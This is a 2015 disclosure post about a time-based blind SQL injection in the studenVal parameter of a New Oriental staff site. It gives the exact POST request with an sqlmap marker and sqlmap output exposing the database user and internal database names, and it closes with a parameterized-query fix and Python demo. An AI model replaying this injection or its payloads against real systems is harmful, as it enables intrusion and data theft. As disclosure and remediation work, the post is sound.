MSSQL blind injection on a New Oriental (新东方) site
Posted: 2015-7-8 08:45, 1434 views


Injection point:

POST /p/Handler/ApiHandler.ashx HTTP/1.1
Content-Length: 87
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: 1aeK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4S2&6N6r3g2K6N6q4)9J5k6i4y4@1j5h3k6X3i4K6u0W2P5r3c8X3i4K6u0W2j5$3^5`.
Cookie: ASP.NET_SessionId=hkjmbgvondvsrk55zj1jxc45
Host: xytest.staff.xdf.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

OpType=IsValidate&studenType=3&studenVal=123456*%20--%20

The studenVal parameter is injectable: MSSQL time-based blind injection. In the request body above, the `*` is sqlmap's custom injection marker (the payload is inserted there) and the trailing `--` comments out the remainder of the server-side query.

current user: 'shanqibin'
current database: 'NISmember0311'
back-end DBMS: Microsoft SQL Server 2008
[11:36:03] [INFO] fetching database names
[11:36:03] [INFO] fetching number of databases
[11:36:03] [INFO] resumed: 59
[11:36:03] [INFO] resumed: A2
[11:36:03] [INFO] resumed: aaa
[11:36:03] [INFO] resumed: AD_PASSPORT_DB
[11:36:03] [INFO] resumed: API
[11:36:03] [INFO] resumed: aspnetdb
[11:36:03] [INFO] resumed: BJ20140519
[11:36:03] [INFO] resumed: BJ20140520
[11:36:03] [INFO] resumed: BJ20140606
[11:36:03] [INFO] resumed: BJ201406061400
[11:36:03] [INFO] resumed: BJ20140714
[11:36:03] [INFO] resumed: BJ20140714_001
[11:36:03] [INFO] resumed: BJ20140915
[11:36:03] [INFO] resumed: bjnis_crm
[11:36:03] [INFO] resumed: BJTEST
[11:36:03] [INFO] resumed: BJTEST_DY
[11:36:03] [INFO] resumed: bushutest
[11:36:03] [INFO] resumed: CQ0825
[11:36:03] [INFO] resumed: CQNIS0519
[11:36:03] [INFO] resumed: CS0818
[11:36:03] [INFO] resumed: DevRequire

There are 59 databases in total; only part of the list was enumerated above.

Fix:
Filter the parameter: validate studenVal against its expected format and pass it to the query as a bound parameter instead of concatenating it into the SQL text.
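As an added illustration of that fix (not the site's code), the following contrasts a handler that concatenates studenVal into the query with one that validates the value and binds it as a parameter. The handler's query (a lookup that validates a student number) and the numeric format of studenVal are assumptions, and SQLite stands in for SQL Server, so the proof uses a boolean payload with the same `'` and `--` mechanics as the post rather than WAITFOR DELAY, which SQLite does not have.

```python
"""Vulnerable concatenation beside the filtered, parameterized fix.

Added example; not the site's code. The query and the expected format of
studenVal are assumptions, and SQLite stands in for SQL Server.
"""
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the student table, with one constructed row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE students (student_no TEXT)")
    conn.execute("INSERT INTO students VALUES ('100001')")
    return conn


def is_validate_vulnerable(conn: sqlite3.Connection, studen_val: str) -> bool:
    # The parameter is pasted straight into the SQL text: a quote in the
    # input ends the literal and whatever follows becomes SQL.
    sql = f"SELECT COUNT(*) FROM students WHERE student_no = '{studen_val}'"
    return conn.execute(sql).fetchone()[0] > 0


def is_well_formed(studen_val: str) -> bool:
    # Assumed format: a student number is 1 to 20 ASCII digits.
    return re.fullmatch(r"[0-9]{1,20}", studen_val) is not None


def is_validate_fixed(conn: sqlite3.Connection, studen_val: str) -> bool:
    # Reject anything outside the expected format, then bind the value as a
    # parameter so the SQL text never changes whatever the input contains.
    if not is_well_formed(studen_val):
        return False
    sql = "SELECT COUNT(*) FROM students WHERE student_no = ?"
    return conn.execute(sql, (studen_val,)).fetchone()[0] > 0


def run_demo(payload: str = "123456' OR 1=1 --") -> tuple:
    """Return (vulnerable verdict, fixed verdict) for the same input."""
    conn = make_db()
    return is_validate_vulnerable(conn, payload), is_validate_fixed(conn, payload)


if __name__ == "__main__":
    print(run_demo())            # (True, False)
    print(run_demo("100001"))    # (True, True): a legitimate number still works
```

The injected input turns the vulnerable query into `... WHERE student_no = '123456' OR 1=1 --'`, so the handler reports a valid student that does not exist; the fixed version refuses the malformed value before it reaches the database, and even a value that slipped past the format check would only ever be compared as a string.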

